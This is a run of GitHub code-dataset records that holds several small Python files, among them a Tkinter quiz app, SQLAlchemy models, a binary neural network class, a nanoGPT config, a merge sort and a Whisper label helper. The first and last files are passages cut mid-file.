GOOD LUCK !\",fg=\"#B900FF\",bg=\"#00C1FF\",wraplength = 500)\n self._readylabel.config(font=(\"Times\",16,'bold'))\n self._readylabel.pack(pady=(0, 0))\n\n self._followlabel = Label(self._root, text=\"CAREFULLY FOLLOW THE\\n INSTRUCTIONS BEFORE STARTING !\",fg=\"#FF0000\", bg=\"#00C1FF\", justify=\"center\")\n self._followlabel.config(font=(\"Arial\", 16, 'bold'))\n self._followlabel.pack(pady=(10, 20))\n\n self._inst1label = Label(self._root, text=\"1. THERE ARE TOTAL 20 QUESTIONS \\nTHAT YOU HAVE TO ATTEND\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst1label.config(font=(\"Arial\", 15))\n self._inst1label.pack(pady=(20, 10), )\n\n self._inst2label = Label(self._root, text=\" 2. ALL QUESTIONS CONSISTS OF 5 (FIVE)\\n MARKS EACH\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst2label.config(font=(\"Arial\", 15))\n self._inst2label.pack(pady=(8, 10))\n\n self._inst3label = Label(self._root, text=\"3. ALL QUESTIONS ARE COMPULSORY\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst3label.config(font=(\"Arial\", 15))\n self._inst3label.pack(pady=(8, 10))\n\n self._inst4label = Label(self._root, text=\"4. ALL ARE MCQ TYPE QUESTIONS\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst4label.config(font=(\"Arial\", 15))\n self._inst4label.pack(pady=(8, 10))\n\n self._inst5label = Label(self._root, text=\"5. CLICK THE START BUTTON WHEN \\n YOU ARE READY\", fg=\"#000\",bg=\"#00C1FF\", justify=\"left\")\n self._inst5label.config(font=(\"Arial\", 15))\n self._inst5label.pack(pady=(8, 10))\n\n self._start = Button(self._root, text=\"START QUIZ\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.start_quiz())\n self._start.config(font=(\"Arial\", 10))\n self._start.pack(pady=(10, 15))\n# TO SHOW THE PREVIOUS SCORED MARKS OF AN OLD USER AND INSTRUCTION PAGE\n def same_user(self):\n self.x = self._db.same_user(self._name,self._email)\n if self.x[0][0]>0:\n self.prev_score = self.x[0][0]\n self.load_quiz_window()\n else:\n self._readylabel = Label(self._root, text=\"READY TO START ?\", fg=\"#FF0000\", bg=\"#00C1FF\")\n self._readylabel.config(font=(\"Algerian\", 30, 'bold'))\n self._readylabel.pack(pady=(30, 20))\n\n self._introlabel = Label(self._root, fg=\"#FF5100\", bg=\"#00C1FF\")\n self._introlabel.config(text=\"HI \" + str(self._name) + \" ARE YOU READY FOR THE QUIZ TEST ?\", wraplength=400)\n self._introlabel.config(font=(\"Algerian\", 18, 'bold'), justify=\"center\")\n self._introlabel.pack(pady=(10, 10))\n\n self._followlabel = Label(self._root, text=\"CAREFULLY FOLLOW THE\\n INSTRUCTIONS BEFORE STARTING !\",fg=\"#FF0000\", bg=\"#00C1FF\", justify=\"center\")\n self._followlabel.config(font=(\"Arial\", 16, 'bold'))\n self._followlabel.pack(pady=(10, 20))\n\n self._inst1label = Label(self._root, text=\"1. THERE ARE TOTAL 20 QUESTIONS \\nTHAT YOU HAVE TO ATTEND\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst1label.config(font=(\"Arial\", 15))\n self._inst1label.pack(pady=(20, 10), )\n\n self._inst2label = Label(self._root, text=\" 2. ALL QUESTIONS CONSISTS OF 5 (FIVE)\\n MARKS EACH\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst2label.config(font=(\"Arial\", 15))\n self._inst2label.pack(pady=(8, 10))\n\n self._inst3label = Label(self._root, text=\"3. ALL QUESTIONS ARE COMPULSORY\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst3label.config(font=(\"Arial\", 15))\n self._inst3label.pack(pady=(8, 10))\n\n self._inst4label = Label(self._root, text=\"4. 
ALL ARE MCQ TYPE QUESTIONS\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst4label.config(font=(\"Arial\", 15))\n self._inst4label.pack(pady=(8, 10))\n\n self._inst5label = Label(self._root, text=\"5. CLICK THE START BUTTON WHEN \\n YOU ARE READY\", fg=\"#000\",bg=\"#00C1FF\", justify=\"left\")\n self._inst5label.config(font=(\"Arial\", 15))\n self._inst5label.pack(pady=(8, 10))\n\n self._start = Button(self._root, text=\"START QUIZ\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.start_quiz())\n self._start.config(font=(\"Arial\", 10))\n self._start.pack(pady=(10, 15))\n# TO LOAD QUESTIONS AND ANSWERS\n def start_quiz(self,i = 0):\n self.clear()\n\n self._questions = [\n \"Q.1. WHO IS THE FIRST PRESIDENT OF INDIA ?\",\n \"Q.2. WHO IS THE FIRST PRESIDENT OF USA ?\",\n \"Q.3. The 'Dalong Village' covering an area of 11.35 sq. km. has recently (May 2017) been declared as Biodiversity Heritage Site under Section 37(1) of Biological Diversity Act, 2002. The village is situated in the Indian State of -\",\n \"Q.4. ........... is the first woman to head a public sector bank.\",\n \"Q.5. World Tourism Day is celebrated on-\",\n \"Q.6. QWhere is Bose Institute?\",\n \"Q.7. When is the International Yoga Day celebrated?\",\n \"Q.8. When Government of India confers the Highest Civilian Honor for Women by presenting Nari Shakti Puraskars ?\",\n \"Q.9. The motif of 'Hampi with Chariot' is printed on the reverse of which currency note?\",\n \"Q.10 Election Commission of India has decided that the voter's identification shall be mandatory in the elections at the time of poll. Which of the following shall be the main document of identification of a voter?\",\n \"Q.11 'Line of Blood' is a book written by whom?\",\n \"Q.12 Which player scored the fastest hat-trick in the Premier League?\",\n \"Q.13 Which player, with 653 games, has made the most Premier League appearances?\",\n \"Q.14 Three players share the record for most Premier League red cards (8). Who are they?\",\n \"Q.15 With 260 goals, who is the Premier League's all-time top scorer?\",\n \"Q.16 When was the inaugural Premier League season?\",\n \"Q.17 Which team won the first Premier League title?\",\n \"Q.18 What's the biggest animal in the world?\",\n \"Q.19 Which country is brie cheese originally from?\",\n \"Q.20 What is the capital of Iceland?\"\n ]\n\n self._answers = [\n [\"RAJENDRA PRASAD\", \"A.P.J ABDUL KALAM\", \"RAMNATH KOVIND\", \"PRANAB MUKHERJEE\"],\n [\"GEORGE WASHINGTON\", \"HITLER\", \"GEORGE BUSH\", \"ABRAHAM LINCOLN\"],\n [\"Manipur\", \"Madhya Pradesh\", \"Mizoram\", \"Maharashtra\"],\n [\"Arundhati Bhattacharya\", \"Shikha Sharma\", \"Chanda Kochar\", \"Usha Ananthasubramanyan\"],\n [\"September 12\", \"September 25\", \"September 27\", \"September 29\"],\n [\" Dispur\", \"Kolkata\", \"Mumbai\", \"New Delhi\"],\n [\"June 21\", \"March 21\", \"April 22\", \"May 31\"],\n [\"June 5\", \"8th March, every year, International Women's Day\", \"June 21\", \"April 7\"],\n [\"One Rupee Note\", \"Rs. 500 note\", \"Rs. 50 note\", \"Rs. 
1000 note\"],\n [\"Voter Slip\", \"Electoral Photo Identity Cards (EPIC)\", \"Indelible ink mark\", \"Electoral rolls\"],\n [\"Bairaj Khanna\", \"Ursula Vernon\", \"Amal EI-Mohtar\", \"Diksha Basu\"],\n [\"SADIO MANE\", \"C.RONALDO\", \"D.BECKHAM\", \"LIONEL MESSI\"],\n [\"Gareth Barry\", \"FABIO\", \"GARETH BALE\", \"ASENSIO\"],\n [\"Patrick Vieira,Richard Dunne and Duncan Ferguson\", \"MESSI,RONALDO AND NEYMAR\",\n \"RAMOS, CARVAJAL AND VIDAL\", \"FABIO,ISCO AND BALE\"],\n [\"Alan Shearer\", \"EDEN HAZARD\", \"D.BECKHAM\", \"WAYNE ROONEY\"],\n [\"1992-93\", \"1993-94\", \"1990-91\", \"1998-99\"],\n [\"MANCHESTER UNITED\", \"MANCHESTER CITY\", \"CHELSEA\", \"TOTENHAM\"],\n [\"BLUE WHALE\", \"ELEPHANT\", \"WHITE SHARK\", \"KILLER WHALE\"],\n [\"FRANCE\", \"ITALY\", \"BRAZIL\", \"SPAIN\"],\n [\"Reykjavík\", \"ZURICH\", \"PARIS\", \"QATAR\"]\n ]\n\n self._correct_answers = [0,0,1,0,2,1,0,1,2,1,0,0,0,0,0,0,0,0,0,0]\n\n\n self._question_label = Label(self._root,text = self._questions[self._index[i]],width = 500,justify = \"left\",wraplength = 500,fg = \"#FF0000\",bg = \"#00C1FF\")\n self._question_label.config(font=(\"Arial\",20,'bold'))\n self._question_label.pack(pady=(50,20),padx = (40,40))\n\n self._radio = IntVar()\n self._radio.set(-1)\n\n r1 = Radiobutton(self._root,text = self._answers[self._index[i]][0],variable = self._radio,value = 0,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r1.config(font=(\"Algerian\",18,'bold'))\n r1.pack(pady = (20,50),padx = (50,50))\n\n r2 = Radiobutton(self._root, text= self._answers[self._index[i]][1], variable=self._radio,value = 1,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r2.config(font=(\"Algerian\", 18,'bold'))\n r2.pack(pady=(0, 50), padx=(50,50))\n\n r3 = Radiobutton(self._root, text= self._answers[self._index[i]][2], variable=self._radio,value = 2,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r3.config(font=(\"Algerian\", 18,'bold'))\n r3.pack(pady=(0, 50), padx=(50,50))\n\n r4 = Radiobutton(self._root, text= self._answers[self._index[i]][3], variable=self._radio,value = 3,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r4.config(font=(\"Algerian\", 18,'bold'))\n r4.pack(pady=(0, 50), padx=(50,50))\n# TO GENERATE RANDOM QUESTION ORDER FOR DIFFERENT USERS\n def generate(self):\n self._index = []\n\n while(len(self._index) < 20):\n x = random.randint(0,19)\n if x in self._index:\n continue\n else:\n self._index.append(x)\n \n\n # TO COLLECT THE ANSWERS FROM USERS\n def next_questions(self,i = 0):\n self._x = self._radio.get()\n self._user_answers.append(self._x)\n\n if i == 0:\n self.clear()\n self.start_quiz(i= 0)\n\n else:\n if i == len(self._index):\n self.calculate_result()\n\n\n else:\n self.clear()\n self.start_quiz(i = i)\n\n# TO CALCULATE THE RESULT\n def calculate_result(self):\n self.clear()\n self._ans_index = 0\n self._score = 0\n\n for i in self._index:\n if self._user_answers[self._ans_index] == self._correct_answers[i]:\n self._score = self._score + 5\n\n self._ans_index = self._ans_index + 1\n\n self.enter_score()\n\n# TO SHOW THE RESULT OF THE USER\n def show_my_result(self):\n\n self._score_label1 = Label(self._root, text=\"END OF QUIZ\", fg=\"#FF00B9\",bg=\"#00C1FF\")\n self._score_label1.config(font=(\"Algerian\", 20,'bold'), justify=\"center\")\n 
self._score_label1.pack(pady=(50, 10))\n\n\n self._score_label = Label(self._root,text = str(self._name) + \" YOU HAVE SCORED \" + str(self._score) + \" OUT OF 100 MARKS\",fg= \"#FF0000\",bg=\"#00C1FF\",wraplength = 500)\n self._score_label.config(font = (\"Algerian\",20,'bold'),justify = \"center\")\n self._score_label.pack(pady = (20,10))\n\n if self._score >= 80:\n imageurl = \"images\\success.png\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0)\n img.image = render\n img.pack(pady=(20, 20))\n\n self._score_label1 = Label(self._root, text= \"YOU ARE A GREAT PARTICIPANT. EXCELLENT !\", fg=\"#FF00B9\", bg=\"#00C1FF\")\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\", 10))\n self._enter.pack(pady=(10, 15))\n\n elif self._score < 80 and self._score >= 50:\n imageurl = \"images\\medium.jpg\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0 )\n img.image = render\n img.pack(pady=(20,20))\n\n self._score_label1 = Label(self._root, text=\"YOU ARE A MEDIOCRE PARTICIPANT. NEED MORE PRACTICE TO CRACK !\", fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 500)\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\", 10))\n self._enter.pack(pady=(10, 15))\n\n else:\n imageurl = \"images\\work.jpeg\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0)\n img.image = render\n img.pack(pady=(20,20))\n\n self._score_label1 = Label(self._root, text=\"YOU ARE ACTUALLY NOT READY FOR THIS QUIZ TEST. NEED TO WORK HARD !\",fg=\"#FF00B9\", bg=\"#00C1FF\", wraplength=500)\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\",10))\n self._enter.pack(pady=(10, 15))\n\n# TO UPDATE THE RESULT SCORED BY USER IN THE DATABASE AGAINST THE USER\n def enter_score(self):\n\n flag = self._db.enter_score(self._score,self._email)\n if flag == 1:\n self.show_my_result()\n else:\n messagebox.showerror(\"ERROR\",\"SORRY SOME PROBLEM OCCURED. 
PLEASE GIVE ANOTHER TRY\")\n\n# TO EXIT THE QUIZ\n def exit_quiz(self):\n self._root.destroy()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nobj = Quiz()","repo_name":"Chiradeep007/Quiz_App","sub_path":"quiz application.py","file_name":"quiz application.py","file_ext":"py","file_size_in_byte":17638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9968140300","text":"class Matchdict:\n def match_two_dict(self,dict1,dict2):\n count1=0\n for item in dict1.items():\n if item in dict2.items():\n count1 += 1\n print(f'found \\\"{count1}\\\" total number of matched items in two dict: ')\ndict1={'a':1,'b':2,'c':3}\ndict2={'a':4,'b':2,'d':3}\nd1=Matchdict()\nd1.match_two_dict(dict1,dict2)\n","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/oops task/oops_dict/_33_match_keys_values_two_dictionary.py","file_name":"_33_match_keys_values_two_dictionary.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25736600029","text":"from sqlalchemy.orm import declarative_base, relationship\nfrom sqlalchemy import (\n Table,\n Column,\n Integer,\n String,\n DateTime,\n Float,\n Text,\n ForeignKey,\n Boolean,\n)\n\nBase = declarative_base()\n\nCLAIM_NAME_LENGTH = 256\nCLAIM_HASH_LENGTH = 96\nTITLE_LENGTH = 512\nKEY_LENGTH = 512 # Might as well\n\n\nclass Article(Base):\n __tablename__ = \"articles\"\n\n id = Column(Integer, primary_key=True)\n\n manuscripts = relationship(\"Manuscript\", back_populates=\"article\")\n base_claim_name = Column(String(CLAIM_NAME_LENGTH))\n channel_name = Column(String(CLAIM_NAME_LENGTH))\n\n encryption_passphrase = Column(String(1024))\n review_passphrase = Column(String(1024))\n\n reviewed = Column(Boolean())\n revision = Column(Integer())\n\n review_server_id = Column(Integer, ForeignKey(\"servers.id\"))\n review_server = relationship(\"Server\")\n\n @property\n def latest_manuscript(self):\n return self.manuscripts[-1]\n\n @property\n def title(self):\n return self.latest_manuscript.title\n\n @property\n def abstract(self):\n return self.latest_manuscript.abstract\n\n @property\n def authors(self):\n return self.latest_manuscript.authors\n\n @property\n def tags(self):\n return self.latest_manuscript.tags\n\n\nclass Manuscript(Base):\n __tablename__ = \"manuscripts\"\n\n id = Column(Integer, primary_key=True)\n claim_name = Column(String(CLAIM_NAME_LENGTH))\n bid = Column(Float(precision=8))\n file_path = Column(String(512))\n submission_date = Column(DateTime())\n txid = Column(String(40))\n txhash = Column(String(CLAIM_HASH_LENGTH))\n\n title = Column(String(TITLE_LENGTH))\n abstract = Column(Text())\n authors = Column(Text())\n tags = Column(String(1024)) # Tags stored as text\n\n article = relationship(\"Article\")\n article_id = Column(Integer, ForeignKey(\"articles.id\"))\n\n\nclass Review(Base):\n __tablename__ = \"reviews\"\n\n id = Column(Integer, primary_key=True)\n\n # The reviewed manuscript will obviously not be by the user and thus not in the database.\n # The metadata is thus kept here.\n submission_title = Column(String(TITLE_LENGTH))\n submission_claim_name = Column(\n String(CLAIM_NAME_LENGTH)\n ) # Will indicate the revision/version number\n submission_channel_name = Column(String(CLAIM_NAME_LENGTH))\n submission_authors = Column(Text())\n submission_date = Column(DateTime())\n\n review_date = Column(DateTime())\n review_text = 
Column(Text())\n review_rating = Column(Integer())\n review_signature = Column(Text()) # String\n review_signature_timestamp = Column(Text()) # String\n\n server_id = Column(Integer, ForeignKey(\"servers.id\"))\n server = relationship(\"Server\")\n\n @property\n def is_sent(self):\n if self.review_date:\n return True\n return False\n\n\nclass Server(Base):\n __tablename__ = \"servers\"\n\n id = Column(Integer, primary_key=True)\n\n name = Column(String(512))\n channel_name = Column(String(512))\n url = Column(String(512))\n submitted_reviews = relationship(\"Review\", back_populates=\"server\")\n\n public_key = Column(String(KEY_LENGTH))\n reviewed_articles = relationship(\"Article\", back_populates=\"review_server\")\n\n @property\n def information(self):\n return {\n \"name\": self.name,\n \"channel_name\": self.channel_name,\n \"url\": self.url,\n \"public_key\": self.public_key,\n }\n","repo_name":"PAPR-chain/papr","sub_path":"papr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27256030384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 8 11:18:15 2021\n\n@author: Jannis\n\"\"\"\nimport numpy as np\n\n\nclass BDNN:\n __numNetworks = 0\n \n def __init__(self, layer_widths=[0], bias_terms=True):\n BDNN.__numNetworks +=1\n \n self.__id = BDNN.__numNetworks\n self.__n = layer_widths[0]\n self.__L = len(layer_widths)-1\n self.__widths = layer_widths[:]\n self.__bias = bias_terms\n \n \n self.__matrices = []\n self.__biasVectors = []\n for l in range(self.__L):\n self.__matrices.append(np.zeros((self.__widths[l+1],self.__widths[l]),dtype=float))\n if self.__bias:\n self.__biasVectors.append(np.zeros(self.__widths[l+1],dtype=float))\n \n def getNumLayers(self):\n return self.__L\n \n def getWidthsLayers(self):\n return self.__widths[:]\n \n def hasBiasTerms(self):\n return self.__bias\n \n def printMatrices(self):\n for l in range(self.__L):\n print(self.__matrices[l])\n \n def printBiasVectors(self):\n for l in range(self.__L):\n print(self.__biasVectors[l])\n \n \n def evaluate(self,x):\n c = x[:] \n for l in range(self.__L):\n c = np.dot(self.__matrices[l],c)\n if self.__bias:\n c = c + self.__biasVectors[l]\n c[c>0]=1\n c = np.maximum(c,0)\n \n return c \n \n def predict(self,X):\n y_pred = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n y_pred[i]=np.argmax(self.evaluate(X[i,:]))\n \n return y_pred\n \n def setBiasVector(self,l,b):\n if b.shape[0]!=self.__biasVectors[l].shape[0]:\n print(\"Error in DNN.setMatrix(): Shapes of Matrices not the same!\")\n else:\n np.copyto(self.__biasVectors[l],b)\n \n def setMatrix(self,l, W):\n if W.shape[0]!=self.__matrices[l].shape[0] or W.shape[1]!=self.__matrices[l].shape[1]:\n print(\"Error in DNN.setMatrix(): Shapes of Matrices not the same!\")\n else:\n np.copyto(self.__matrices[l],W)\n \n def getMatrix(self,l):\n if l.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT }),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"chetweger/tutor-me-english","sub_path":"tutorme/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70084204268","text":"import math\nimport sys\nfrom matplotlib import pyplot\n\n\nclass inputParser:\n def __init__(self, fileName):\n with open(\"input/\" + fileName, \"r\") as file:\n lines = file.readlines()\n 
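# The first line of the input file is the scenario header: simulation seconds,\n            # number of intersections, number of streets, number of cars and the per-car bonus.\n            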
dataNodes = [int(node) for node in lines[0].split(\" \")]\n self.data = {\"seconds\": dataNodes[0], \"intersections\": dataNodes[1], \"streets\": dataNodes[2], \"cars\": dataNodes[3], \"bonus\": dataNodes[4]}\n self.streetData = {}\n self.intersectionData = [None] * self.data['intersections']\n self.intersectionCount = 0\n \n for line in lines[1:self.data['streets'] + 1]:\n nodes = line.split(\" \")\n self.streetData[nodes[2]] = {'startInter': int(nodes[0]), 'endInter': int(nodes[1]), 'time': int(nodes[3]), 'count': 0}\n if not self.intersectionData[int(nodes[1])]:\n self.intersectionData[int(nodes[1])] = []\n self.intersectionCount += 1\n\n self.intersectionData[int(nodes[1])].append(nodes[2])\n \n self.carData = []\n \n \n for line in lines[self.data['streets'] + 1:]:\n nodes = line.split()\n self.carData.append({'num': nodes[0], 'streets': nodes[1:]})\n for st in nodes[1:]:\n self.streetData[st]['count'] += 1\n\n def __str__(self):\n string = \"Streets:\\n\"\n for key, elem in self.streetData.items():\n string += key + \": \" + \"Start Intersection: \" + str(elem['startInter']) + \", End Intersection: \" + str(elem['endInter']) + \", Time needed to traverse: \" + str(elem['time']) + \"\\n\"\n string += \"Cars:\\n\"\n for elem in self.carData:\n string += \"Number of streets to cross: \" + str(elem['num']) + \", Path: \" + str(elem['streets']) + \"\\n\"\n return string\n\n\n\nparse = inputParser(sys.argv[1])\n\nfor car in parse.carData:\n print(car['num'])\n\n\n","repo_name":"danmohedano/competitive-programming","sub_path":"hashcode/2021/solutionbeni.py","file_name":"solutionbeni.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42332786368","text":"filepath= \"filename.txt\"\r\narrfile = []\r\n\r\nwith open(filepath, \"r\", encoding=\"utf-8\") as file:\r\n for line in file:\r\n arrfile.append(line.strip())\r\n\r\nimport os\r\nimport shutil\r\n\r\n# Directory paths\r\nsource_directory = 'C:/file/pdf'\r\ndestination_directory = 'C:/file/dest'\r\n\r\n# Function to copy files\r\ndef copy_files(file_list, source_dir, dest_dir):\r\n for file_name in file_list:\r\n source_file_path = os.path.join(source_dir, file_name)\r\n dest_file_path = os.path.join(dest_dir, file_name)\r\n if os.path.exists(source_file_path):\r\n try:\r\n shutil.copyfile(source_file_path, dest_file_path)\r\n print(f\"File '{file_name}' copied successfully.\")\r\n except Exception as e:\r\n print(f\"Error copying '{file_name}': {e}\")\r\n else:\r\n print(f\"File '{file_name}' does not exist in the source directory.\")\r\n\r\n# Call the function\r\ncopy_files(arrfile, source_directory, destination_directory)","repo_name":"Asc2018Uni/file","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36889630708","text":"import json\n\nresult = list()\nwith open('DB.json', 'r') as f:\n data = json.loads(f.read())\n for tmp in data:\n print(tmp)\n if tmp[\"address\"] == \"경기 포천시 이동면 화동로 1925-47\":\n tmp[\"latitude\"] = 127.364518333317\n tmp[\"longitude\"] = 38.0189834254687\n elif tmp[\"address\"] == \"경남 통영시 천대국치길 297-10 (인평동)\":\n tmp[\"latitude\"] = 128.39007097737\n tmp[\"longitude\"] = 34.8385493982446\n elif tmp[\"address\"] == \"전남 함평군 신광면 덕일길 192-91\":\n tmp[\"latitude\"] = 126.509447278409\n tmp[\"longitude\"] = 35.1363395468159\n elif tmp[\"address\"] == \"경기 고양시 덕양구 북한산로387번길 180 
(지축동)\":\n tmp[\"latitude\"] = 126.949793353391\n tmp[\"longitude\"] = 37.6671521092109\n else:\n tmp[\"latitude\"] = float(tmp[\"latitude\"].replace(\"4d\", \"\"))\n tmp[\"longitude\"] = float(\n tmp[\"longitude\"].replace(\"3d\", \"\").replace('!', ''))\n result.append(tmp)\n\nwith open('DB_final.json', 'w') as f:\n f.write(json.dumps(result))\n","repo_name":"KwangKwang-untact/Untact-Spot-Server","sub_path":"src/scripts/xylocale.py","file_name":"xylocale.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29775621640","text":"out_dir = 'out-western_robot_gambling'\neval_interval = 250\neval_iters = 200\nlog_interval = 10\n\nalways_save_checkpoint = True\n\ninit_from = 'resume' # 'scratch' or 'resume' or 'gpt2*'\n\ndataset = 'western_robot_gambling'\ngradient_accumulation_steps = 1\nbatch_size = 64\nblock_size = 300 # context of up to 256 previous characters\n\nn_layer = 6\nn_head = 6\nn_embd = 384\ndropout = 0.2\n\nlearning_rate = 1e-4 # with baby networks can afford to go a bit higher\nmax_iters = 30000\nlr_decay_iters = max_iters # make equal to max_iters usually\nmin_lr = 1e-5 # learning_rate / 10 usually\nbeta2 = 0.99 # make a bit bigger because number of tokens per iter is small\n\nwarmup_iters = 100\n","repo_name":"abusch8/PlotBot","sub_path":"nanoGPT/config/train_western_robot_disaster.py","file_name":"train_western_robot_disaster.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1132324198","text":"# 일단 반으로 나누고 합쳐서 정렬\n# n/2로 나누고, 1개의 요소가 남기까지 재귀적으로 divide한다\n# 그 후, 그 다음에 2개씩 요소들을 반복적으로 merge한다 \n\ndef divide(list):\n if len(list) <= 1:\n return list\n mid = len(list) // 2\n left_list = list[:mid]\n right_list = list[mid:]\n left_list = merge(left_list)\n right_list = merge(right_list)\n return merge(left_list,right_list)\n\ndef merge(left,right):\n arr = []\n while len(left)>0 or len(right)>0:\n if len(left)>0 and len(right)>0:\n if left[0] <= right[0]:\n arr.append(left[0])\n left = left[1:]\n else:\n arr.append(right[0])\n right = right[1:]\n elif len(left) > 0:\n arr.append(left[0])\n left = left[1:]\n elif len(right) > 0:\n arr.append(right[0])\n right = right[1:]\n return arr \n","repo_name":"yeye921/algorithm-study","sub_path":"data-structure/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72107151148","text":"from typing import Tuple\nimport torch\nfrom transformers import WhisperTokenizer\n\n\nBOS_TOKEN_ID = 50258\n\n\ndef get_labels_with_prompt(labels: torch.Tensor,\n tokenizer: WhisperTokenizer,\n language: str = \"en\",\n task: str = \"transcribe\",\n no_timestamps: bool = True)-> Tuple[torch.Tensor, int, int]:\n \"\"\"\n --- LEGACY: kept for reference ---\n \n Returns the labels with the prefix and suffix tokens, as well as the number of prefix and suffix tokens.\n `labels_with_prompt` should be used as the `decoder_input_ids` argument for the `forward` method of the model.\n \n Note: n_prefix_tokens should be 4 (BOS, language, task, if_timestamps) and n_suffix_tokens should be 1 (EOS).\n \"\"\"\n \n # Get batch size:\n batch_size = labels.shape[0]\n\n # Get prefix tokens:\n forced_decoder_ids = tokenizer.get_decoder_prompt_ids(language=language, task=task, no_timestamps=no_timestamps) # language, task, if_timestamps\n 
prefix_tokens = torch.IntTensor([BOS_TOKEN_ID] + [token_id for idx, token_id in forced_decoder_ids]) # (n_prefix_tokens, )\n prefix_tokens = prefix_tokens.expand(batch_size, -1) # (batch_size, n_prefix_tokens)\n\n # Get suffix tokens:\n suffix_tokens = torch.IntTensor([tokenizer.eos_token_id]) # (n_suffix_tokens, )\n suffix_tokens = suffix_tokens.expand(batch_size, -1) # (batch_size, n_suffix_tokens)\n\n # Get prefix and suffix lengths:\n n_prefix_tokens = prefix_tokens.shape[1] # n_prefix_tokens\n n_suffix_tokens = suffix_tokens.shape[1] # n_suffix_tokens\n \n # Send tensors to the same device as the `labels` tensor:\n prefix_tokens = prefix_tokens.to(labels.device)\n suffix_tokens = suffix_tokens.to(labels.device)\n \n # Concatenate the prefix tensor with the original tensor along the second dimension:\n labels_with_prompt = torch.cat((prefix_tokens, labels, suffix_tokens), dim=1) # (batch_size, n_tokens_labels + n_prefix_tokens + n_suffix_tokens)\n\n return labels_with_prompt, n_prefix_tokens, n_suffix_tokens\n\n\ndef get_attention_mask_with_prompt(attention_mask_labels: torch.Tensor,\n n_prefix_tokens: int,\n n_suffix_tokens: int) -> torch.Tensor:\n \"\"\"\n --- LEGACY: kept for reference ---\n \n Returns the attention mask for which the correct mask was added for the prefix and suffix tokens.\n \"\"\"\n \n # Get batch size:\n batch_size = attention_mask_labels.shape[0]\n \n # Get prefix and suffix attention masks:\n attention_prefix = torch.ones(batch_size, n_prefix_tokens) # (batch_size, n_prefix_tokens)\n attention_suffix = torch.ones(batch_size, n_suffix_tokens) # (batch_size, n_suffix_tokens)\n \n # Send tensors to the same device as the `labels` tensor:\n attention_prefix = attention_prefix.to(attention_mask_labels.device)\n attention_suffix = attention_suffix.to(attention_mask_labels.device)\n \n 